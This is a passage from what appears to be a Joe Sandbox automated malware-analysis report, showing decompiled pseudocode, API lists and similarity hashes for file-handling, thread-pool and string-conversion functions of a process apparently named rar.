				if ( &(_t66[0]) -  &_a1744 < 0) goto 0x50b77975;
				_a16 = _a16 & 0x00000000;
				_a8 = _a8 & 0x00000000;
				_v0 = 0xd55;
				_v8 =  &_a1752;
				r9d = 0;
				_t33 = WideCharToMultiByte(??, ??, ??, ??, ??, ??, ??, ??);
				_t48 = _t33;
				if (_t33 == 0) goto 0x50b77a37;
				if (_t33 == 0) goto 0x50b77a27;
				_v8 = _v8 & 0x00000000;
				r8d = _t48;
				r8d = r8d;
				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0x50b77a37;
				if (0 + _a24 - _t48 < 0) goto 0x50b779f4;
				__rcx[1] = __edi - r15d;
				goto 0x50b7796a;
				 *__rcx = GetLastError();
				return E00007FF67FF650B69D10(_t37, 0, _a5176 ^ _t88 - __rax);
			}














                                                                                                            0x7ff650b778fc
                                                                                                            0x7ff650b77901
                                                                                                            0x7ff650b77913
                                                                                                            0x7ff650b7791b
                                                                                                            0x7ff650b77925
                                                                                                            0x7ff650b77936
                                                                                                            0x7ff650b77944
                                                                                                            0x7ff650b77948
                                                                                                            0x7ff650b77960
                                                                                                            0x7ff650b77963
                                                                                                            0x7ff650b7796a
                                                                                                            0x7ff650b77970
                                                                                                            0x7ff650b77978
                                                                                                            0x7ff650b7797a
                                                                                                            0x7ff650b77985
                                                                                                            0x7ff650b7798c
                                                                                                            0x7ff650b7798f
                                                                                                            0x7ff650b77993
                                                                                                            0x7ff650b779a5
                                                                                                            0x7ff650b779a7
                                                                                                            0x7ff650b779b2
                                                                                                            0x7ff650b779c0
                                                                                                            0x7ff650b779d3
                                                                                                            0x7ff650b779d8
                                                                                                            0x7ff650b779e2
                                                                                                            0x7ff650b779e8
                                                                                                            0x7ff650b779ec
                                                                                                            0x7ff650b779f2
                                                                                                            0x7ff650b779f4
                                                                                                            0x7ff650b77a09
                                                                                                            0x7ff650b77a12
                                                                                                            0x7ff650b77a1d
                                                                                                            0x7ff650b77a25
                                                                                                            0x7ff650b77a2c
                                                                                                            0x7ff650b77a32
                                                                                                            0x7ff650b77a3d
                                                                                                            0x7ff650b77a6d

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharErrorFileLastMultiWideWrite
                                                                                                            • String ID: U
                                                                                                            • API String ID: 2456169464-4171548499
                                                                                                            • Opcode ID: fd8a80873e235dad630b3ebebdca9cf2fab3fcba23e482ef14b54424157e849e
                                                                                                            • Instruction ID: 06a08a4d337ed43145cb3299ee682b1daed248d36cce64ad676eb660ae2f9772
                                                                                                            • Opcode Fuzzy Hash: fd8a80873e235dad630b3ebebdca9cf2fab3fcba23e482ef14b54424157e849e
                                                                                                            • Instruction Fuzzy Hash: 2341C322B29682A2EB608F25E5843B977A0FB89B94F484131EE8ED7794DF3DD541C740
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B338FC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 99COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 69%
                                                                                                            			E00007FF67FF650B338FC(void* __ecx, long long __rbx, void* __rcx, void* __rdx, void* __r9, long long _a24) {
				signed int _v72;
				char _v184;
				char _v200;
				signed long long _v216;
				void* _t32;
				signed long long _t65;
				signed long long _t66;
				signed long long _t71;
				signed long long _t75;
				void* _t88;
				void* _t90;
				void* _t91;
				void* _t92;
				void* _t93;
				long long _t101;
				signed long long _t102;
				signed long long _t103;

				_t100 = __r9;
				_t88 = __rdx;
				_a24 = __rbx;
				_t65 =  *0x50b978f0; // 0x27db226282f1
				_t66 = _t65 ^ _t93 - 0x000000c0;
				_v72 = _t66;
				_t103 = _t102 | 0xffffffff;
				_t91 = __rdx;
				r12d = 0;
				_t90 = __rcx;
				_t75 = _t103 + 1;
				if ( *((intOrPtr*)(__rcx + _t75 * 2)) != r12w) goto 0x50b33935;
				_t5 =  &_v200; // 0x7f0
				_v200 = _t101;
				_t32 = E00007FF67FF650B5B9D8(_t5);
				_t7 =  &_v200; // 0x7f0
				E00007FF67FF650B5B878(_t32, _t7, _t88);
				r15d = GetCurrentProcessId();
				_t12 =  &_v184; // 0x800
				r9d = r15d;
				r14d = r14d - ((r14d - (0x4f8b588f * r14d >> 0x20) >> 1) + (0x4f8b588f * r14d >> 0x20) >> 0xf) * 0xc350;
				_v216 = r14d;
				E00007FF67FF650B1657C(__ecx, 0x368f0847, _t12, _t88, L"%u.%03u", __r9);
				_t18 =  &_v184; // 0x800
				if ( *((intOrPtr*)(_t18 + (_t103 + 1) * 2)) != r12w) goto 0x50b339c4;
				goto 0x50b33a2e;
				if (r12d == 0x3e8) goto 0x50b33a36;
				_t23 =  &_v184; // 0x800
				E00007FF67FF650B5A390(_t90 + _t75 * 2, _t23, _t91 - _t75);
				if (E00007FF67FF650B334CC(_t103 + 1, _t75, _t90) == 0xffffffff) goto 0x50b33a63;
				r9d = r15d;
				_t24 =  &_v184; // 0x800
				_v216 = ((_t66 - _t88 >> 1) + _t88 >> 0x10) + _t92;
				E00007FF67FF650B1657C(__ecx, _t103 + 1, _t24, _t23, L"%u.%03u", _t100);
				_t27 =  &_v184; // 0x800
				_t71 = _t103 + 1;
				if ( *((intOrPtr*)(_t27 + _t71 * 2)) != r12w) goto 0x50b33a24;
				if (_t71 + _t75 - _t91 < 0) goto 0x50b339d0;
				return E00007FF67FF650B69D10(0, __ecx, _v72 ^ _t93 - 0x000000c0);
			}




















                                                                                                            0x7ff650b338fc
                                                                                                            0x7ff650b338fc
                                                                                                            0x7ff650b338fc
                                                                                                            0x7ff650b33913
                                                                                                            0x7ff650b3391a
                                                                                                            0x7ff650b3391d
                                                                                                            0x7ff650b33925
                                                                                                            0x7ff650b33929
                                                                                                            0x7ff650b3392f
                                                                                                            0x7ff650b33932
                                                                                                            0x7ff650b33935
                                                                                                            0x7ff650b3393d
                                                                                                            0x7ff650b3393f
                                                                                                            0x7ff650b33944
                                                                                                            0x7ff650b33949
                                                                                                            0x7ff650b3394e
                                                                                                            0x7ff650b33953
                                                                                                            0x7ff650b33985
                                                                                                            0x7ff650b33988
                                                                                                            0x7ff650b33992
                                                                                                            0x7ff650b339af
                                                                                                            0x7ff650b339b2
                                                                                                            0x7ff650b339b7
                                                                                                            0x7ff650b339bc
                                                                                                            0x7ff650b339cc
                                                                                                            0x7ff650b339ce
                                                                                                            0x7ff650b339d6
                                                                                                            0x7ff650b339e2
                                                                                                            0x7ff650b339e7
                                                                                                            0x7ff650b339f7
                                                                                                            0x7ff650b33a02
                                                                                                            0x7ff650b33a05
                                                                                                            0x7ff650b33a13
                                                                                                            0x7ff650b33a17
                                                                                                            0x7ff650b33a1c
                                                                                                            0x7ff650b33a24
                                                                                                            0x7ff650b33a2c
                                                                                                            0x7ff650b33a34
                                                                                                            0x7ff650b33a62

                                                                                                            APIs
                                                                                                            • GetCurrentProcessId.KERNEL32 ref: 00007FF650B33975
                                                                                                            • swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF650B339B7
                                                                                                              • Part of subcall function 00007FF650B334CC: GetFileAttributesW.KERNELBASE(00000000,00007FF650B33465,?,?,?,?,?,?,?,?,00007FF650B44252,?,?,?,?,The system cannot find the file specified.), ref: 00007FF650B334F4
                                                                                                              • Part of subcall function 00007FF650B334CC: GetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,00007FF650B44252,?,?,?,?,The system cannot find the file specified.,00000800,00000000), ref: 00007FF650B3351D
                                                                                                            • swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF650B33A17
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AttributesFileswprintf$CurrentProcess
                                                                                                            • String ID: %u.%03u
                                                                                                            • API String ID: 2814246642-1114938957
                                                                                                            • Opcode ID: 6962498924fa3b7389b17e31d6d96ed062b2f124581b46c55456c8809d95dd4e
                                                                                                            • Instruction ID: cacec2ce5fa9a4b44f7f82e63b8060efebabf6c6a9a51602b7cfda10ad9d3e8f
                                                                                                            • Opcode Fuzzy Hash: 6962498924fa3b7389b17e31d6d96ed062b2f124581b46c55456c8809d95dd4e
                                                                                                            • Instruction Fuzzy Hash: 81313C12B14687A2E620DB19E4807AA6264FB49B94F580731EE4FD77E1EE3ED446C300
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B1721C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 57libraryloaderCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressHandleModuleProcVersion
                                                                                                            • String ID: CompareStringOrdinal$kernel32.dll
                                                                                                            • API String ID: 3310240892-2120454788
                                                                                                            • Opcode ID: f9509c16b4b5411875c0879ae9eaba9bdfad74eac4e5af0d19ee5966fbc41561
                                                                                                            • Instruction ID: 79d66d5c4b1c6080f4bb282f0164d2a70b92d35445a5ad9fdfdab12c72d000bb
                                                                                                            • Opcode Fuzzy Hash: f9509c16b4b5411875c0879ae9eaba9bdfad74eac4e5af0d19ee5966fbc41561
                                                                                                            • Instruction Fuzzy Hash: 8E216A31E5CA43A1FB508B15AAC053433A0AF2BB84F2C4534E95EE37A4DF3EE4468244
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B5B0B8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 43%
                                                                                                            			E00007FF67FF650B5B0B8(intOrPtr __edx, long long __rax, long long __rbx, intOrPtr* __rcx, void* __r9, long long _a8) {
				void* _t21;
				void* _t50;

				_t51 = __r9;
				_a8 = __rbx;
				 *__rcx = __edx;
				if (__edx - 0x40 <= 0) goto 0x50b5b0d6;
				 *__rcx = 0x40;
				goto 0x50b5b0e5;
				if (0x40 != 0) goto 0x50b5b0e5;
				 *__rcx = 1;
				 *(__rcx + 0x208) =  *(__rcx + 0x208) & 0x00000000;
				 *((char*)(__rcx + 0x618)) = 0;
				_t17 =  >  ? 0x40 :  *__rcx;
				 *__rcx =  >  ? 0x40 :  *__rcx;
				InitializeCriticalSection(??);
				r9d = 0;
				r8d = 0x40;
				CreateSemaphoreW(??, ??, ??, ??);
				r9d = 0;
				 *((long long*)(__rcx + 0x620)) = __rax;
				_t6 = _t51 + 1; // 0x1
				r8d = _t6;
				CreateEventW(??, ??, ??, ??);
				 *((long long*)(__rcx + 0x628)) = __rax;
				if ( *((long long*)(__rcx + 0x620)) == 0) goto 0x50b5b148;
				_t35 = __rax;
				if (__rax != 0) goto 0x50b5b16c;
				E00007FF67FF650B2C95C(__rax, 0x50ba7ab8, L"\nThread pool initialization failed.", _t50, __r9);
				_t21 = E00007FF67FF650B2C930(2, _t35, __rcx, 0x50ba7ab8, L"\nThread pool initialization failed.", _t50, __r9);
				 *(__rcx + 0x610) =  *(__rcx + 0x610) & 0x00000000;
				 *(__rcx + 0x614) =  *(__rcx + 0x614) & 0x00000000;
				 *(__rcx + 0x20c) =  *(__rcx + 0x20c) & 0x00000000;
				return _t21;
			}





                                                                                                            0x7ff650b5b0b8
                                                                                                            0x7ff650b5b0b8
                                                                                                            0x7ff650b5b0c7
                                                                                                            0x7ff650b5b0ce
                                                                                                            0x7ff650b5b0d0
                                                                                                            0x7ff650b5b0d4
                                                                                                            0x7ff650b5b0d8
                                                                                                            0x7ff650b5b0da
                                                                                                            0x7ff650b5b0e7
                                                                                                            0x7ff650b5b0f0
                                                                                                            0x7ff650b5b0f7
                                                                                                            0x7ff650b5b0fa
                                                                                                            0x7ff650b5b103
                                                                                                            0x7ff650b5b109
                                                                                                            0x7ff650b5b10c
                                                                                                            0x7ff650b5b113
                                                                                                            0x7ff650b5b119
                                                                                                            0x7ff650b5b11e
                                                                                                            0x7ff650b5b125
                                                                                                            0x7ff650b5b129
                                                                                                            0x7ff650b5b12c
                                                                                                            0x7ff650b5b13a
                                                                                                            0x7ff650b5b141
                                                                                                            0x7ff650b5b143
                                                                                                            0x7ff650b5b146
                                                                                                            0x7ff650b5b156
                                                                                                            0x7ff650b5b167
                                                                                                            0x7ff650b5b16c
                                                                                                            0x7ff650b5b176
                                                                                                            0x7ff650b5b17d
                                                                                                            0x7ff650b5b18e

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                                                            • String ID: Thread pool initialization failed.
                                                                                                            • API String ID: 3340455307-2182114853
                                                                                                            • Opcode ID: 45085f8e400b7a55034debebe6b235dc3c483c7f59d19de4abdf3cbec87af772
                                                                                                            • Instruction ID: 496110ecdba4ad8128bea65946766914e6a96083dbfdbe4e316d3a21b81470e7
                                                                                                            • Opcode Fuzzy Hash: 45085f8e400b7a55034debebe6b235dc3c483c7f59d19de4abdf3cbec87af772
                                                                                                            • Instruction Fuzzy Hash: 3921B732B2964396F7508F24D4947BE32A2EF89B08F1C8034CA0E9A395DF7FD8558780
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B33C1C Relevance: 6.1, APIs: 4, Instructions: 129filetimeCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 34%
                                                                                                            			E00007FF67FF650B33C1C(void* __rax, void* __rcx, long long __rdx, intOrPtr* __r8, intOrPtr* __r9, long long _a8, char _a16, char _a24, char _a32, char _a48, signed int _a4144) {
				signed long long _v0;
				signed int _v16;
				intOrPtr _v24;
				intOrPtr _v32;
				void* __rbx;
				void* __rsi;
				void* _t34;
				void* _t35;
				void* _t36;
				signed long long _t67;
				signed long long _t68;
				void* _t72;
				void* _t94;
				void* _t101;
				void* _t102;
				intOrPtr* _t104;

				E00007FF67FF650B69CB0(0x1088, __rax, _t101, _t102);
				_t95 = _t94 - __rax;
				_t67 =  *0x50b978f0; // 0x27db226282f1
				_t68 = _t67 ^ _t94 - __rax;
				_a4144 = _t68;
				_a8 = __rdx;
				_t104 = __r8;
				if (__rdx == 0) goto 0x50b33c67;
				r12b = 1;
				if ( *((intOrPtr*)(__rdx)) != __rcx) goto 0x50b33c6a;
				r12b = 0;
				if (__r8 == 0) goto 0x50b33c77;
				r14b = 1;
				if ( *__r8 != __rcx) goto 0x50b33c7a;
				r14b = 0;
				if (__r9 == 0) goto 0x50b33c87;
				bpl = 1;
				if ( *__r9 != __rcx) goto 0x50b33c8a;
				bpl = 0;
				if (E00007FF67FF650B334CC(_t68, _t72, __rcx) == 0xffffffff) goto 0x50b33caa;
				if ((0x00000001 & dil) == 0) goto 0x50b33caa;
				E00007FF67FF650B33DE4(1, 0, _t68, _t72, __rcx, __rcx);
				goto 0x50b33cac;
				_v16 = _v16 & 0x00000000;
				r8d = 3;
				_v24 = 0x2000000;
				r9d = 0;
				_v32 = 3;
				CreateFileW(??, ??, ??, ??, ??, ??, ??);
				_v0 = _t68;
				if (_t68 != 0xffffffff) goto 0x50b33d38;
				r8d = 0x800;
				if (E00007FF67FF650B44664(_t68, _t72, __rcx,  &_a48, __r8) == 0) goto 0x50b33dbe;
				_v16 = _v16 & 0x00000000;
				r8d = 3;
				_v24 = 0x2000000;
				r9d = 0;
				_v32 = r8d;
				_t34 = CreateFileW(??, ??, ??, ??, ??, ??, ??);
				_v0 = _t68;
				if (_t68 == 0xffffffff) goto 0x50b33dbe;
				if (r12b == 0) goto 0x50b33d4c;
				_t35 = E00007FF67FF650B5B898(_t34, 0, _a8,  &_a16);
				if (r14b == 0) goto 0x50b33d5e;
				_t36 = E00007FF67FF650B5B898(_t35, 0, _t104,  &_a32);
				if (bpl == 0) goto 0x50b33d70;
				E00007FF67FF650B5B898(_t36, 0, __r9,  &_a24);
				r12b =  ~r12b;
				asm("dec ebp");
				bpl =  ~bpl;
				asm("dec ebp");
				r14b =  ~r14b;
				asm("dec eax");
				SetFileTime(??, ??, ??, ??);
				CloseHandle(??);
				if (0 == 0) goto 0x50b33dbe;
				return E00007FF67FF650B69D10(E00007FF67FF650B33DE4(0, _t29,  &_a32, _t72, __rcx, __rcx), 0, _a4144 ^ _t95);
			}



















                                                                                                            0x7ff650b33c2e
                                                                                                            0x7ff650b33c33
                                                                                                            0x7ff650b33c36
                                                                                                            0x7ff650b33c3d
                                                                                                            0x7ff650b33c40
                                                                                                            0x7ff650b33c4b
                                                                                                            0x7ff650b33c55
                                                                                                            0x7ff650b33c5d
                                                                                                            0x7ff650b33c5f
                                                                                                            0x7ff650b33c65
                                                                                                            0x7ff650b33c67
                                                                                                            0x7ff650b33c6d
                                                                                                            0x7ff650b33c6f
                                                                                                            0x7ff650b33c75
                                                                                                            0x7ff650b33c77
                                                                                                            0x7ff650b33c7d
                                                                                                            0x7ff650b33c7f
                                                                                                            0x7ff650b33c85
                                                                                                            0x7ff650b33c87
                                                                                                            0x7ff650b33c97
                                                                                                            0x7ff650b33c9c
                                                                                                            0x7ff650b33ca3
                                                                                                            0x7ff650b33ca8
                                                                                                            0x7ff650b33cac
                                                                                                            0x7ff650b33cb7
                                                                                                            0x7ff650b33cba
                                                                                                            0x7ff650b33cc2
                                                                                                            0x7ff650b33cc5
                                                                                                            0x7ff650b33cd1
                                                                                                            0x7ff650b33cd7
                                                                                                            0x7ff650b33ce0
                                                                                                            0x7ff650b33ce2
                                                                                                            0x7ff650b33cf7
                                                                                                            0x7ff650b33cfd
                                                                                                            0x7ff650b33d08
                                                                                                            0x7ff650b33d0e
                                                                                                            0x7ff650b33d16
                                                                                                            0x7ff650b33d19
                                                                                                            0x7ff650b33d23
                                                                                                            0x7ff650b33d29
                                                                                                            0x7ff650b33d32
                                                                                                            0x7ff650b33d3b
                                                                                                            0x7ff650b33d47
                                                                                                            0x7ff650b33d4f
                                                                                                            0x7ff650b33d59
                                                                                                            0x7ff650b33d61
                                                                                                            0x7ff650b33d6b
                                                                                                            0x7ff650b33d7a
                                                                                                            0x7ff650b33d7d
                                                                                                            0x7ff650b33d88
                                                                                                            0x7ff650b33d8b
                                                                                                            0x7ff650b33d96
                                                                                                            0x7ff650b33d99
                                                                                                            0x7ff650b33d9f
                                                                                                            0x7ff650b33daa
                                                                                                            0x7ff650b33db2
                                                                                                            0x7ff650b33de1

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$Create$CloseHandleTime
                                                                                                            • String ID:
                                                                                                            • API String ID: 2287278272-0
                                                                                                            • Opcode ID: f690c4dac40788887fc7c518684561a52728024d7725afad2720983a28d2826c
                                                                                                            • Instruction ID: c1fbef1c606ca343b22e90c0527a62d0047c09d77e809300f417fe71afbead21
                                                                                                            • Opcode Fuzzy Hash: f690c4dac40788887fc7c518684561a52728024d7725afad2720983a28d2826c
                                                                                                            • Instruction Fuzzy Hash: 1141F622A0C64362EA608715A4807BB67A0EF87BE4F685331ED5E977E4DE3ED4458700
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B7514C Relevance: 6.1, APIs: 4, Instructions: 104COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 90%
                                                                                                            			E00007FF67FF650B7514C(signed int __edx, intOrPtr* __rax, long long __rbx, signed int* __rcx, void* __rdx, long long __rsi, void* __r8, long long _a8, long long _a24, signed int _a32, intOrPtr _a40) {
				void* _v8;
				char _v16;
				intOrPtr* _v32;
				char _v40;
				void* _t17;
				intOrPtr* _t41;
				void* _t53;

				_a8 = __rbx;
				_a24 = __rsi;
				_a32 = r9w;
				_t53 = __rdx;
				if (__rdx != 0) goto 0x50b75182;
				if (__r8 == 0) goto 0x50b75182;
				if (__rcx == 0) goto 0x50b7517b;
				 *__rcx =  *__rcx & __edx;
				goto 0x50b75211;
				if (__rcx == 0) goto 0x50b7518a;
				 *__rcx =  *__rcx | 0xffffffff;
				if (__r8 - 0x7fffffff <= 0) goto 0x50b751a6;
				_t17 = E00007FF67FF650B74DAC(__rax);
				 *__rax = 0x16;
				E00007FF67FF650B74C8C(_t17);
				goto 0x50b7520f;
				E00007FF67FF650B6F614(__rax, __rcx,  &_v40, _a40);
				_t41 = _v32;
				if ( *((long long*)(_t41 + 0x138)) != 0) goto 0x50b75240;
				if ((_a32 & 0x0000ffff) - 0xff <= 0) goto 0x50b75223;
				if (_t53 == 0) goto 0x50b751f0;
				if (__r8 == 0) goto 0x50b751f0;
				E00007FF67FF650B6C1A0(_a32 & 0x0000ffff, 0, _t53, _a40, __r8);
				E00007FF67FF650B74DAC(_t41);
				 *_t41 = 0x2a;
				if (_v16 == 0) goto 0x50b7520f;
				 *(_v40 + 0x3a8) =  *(_v40 + 0x3a8) & 0xfffffffd;
				return 0x2a;
			}










                                                                                                            0x7ff650b7514c
                                                                                                            0x7ff650b75151
                                                                                                            0x7ff650b75156
                                                                                                            0x7ff650b75164
                                                                                                            0x7ff650b7516d
                                                                                                            0x7ff650b75172
                                                                                                            0x7ff650b75177
                                                                                                            0x7ff650b75179
                                                                                                            0x7ff650b7517d
                                                                                                            0x7ff650b75185
                                                                                                            0x7ff650b75187
                                                                                                            0x7ff650b75191
                                                                                                            0x7ff650b75193
                                                                                                            0x7ff650b7519d
                                                                                                            0x7ff650b7519f
                                                                                                            0x7ff650b751a4
                                                                                                            0x7ff650b751b3
                                                                                                            0x7ff650b751b8
                                                                                                            0x7ff650b751c5
                                                                                                            0x7ff650b751d7
                                                                                                            0x7ff650b751dc
                                                                                                            0x7ff650b751e1
                                                                                                            0x7ff650b751eb
                                                                                                            0x7ff650b751f0
                                                                                                            0x7ff650b751fa
                                                                                                            0x7ff650b75201
                                                                                                            0x7ff650b75208
                                                                                                            0x7ff650b75222

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
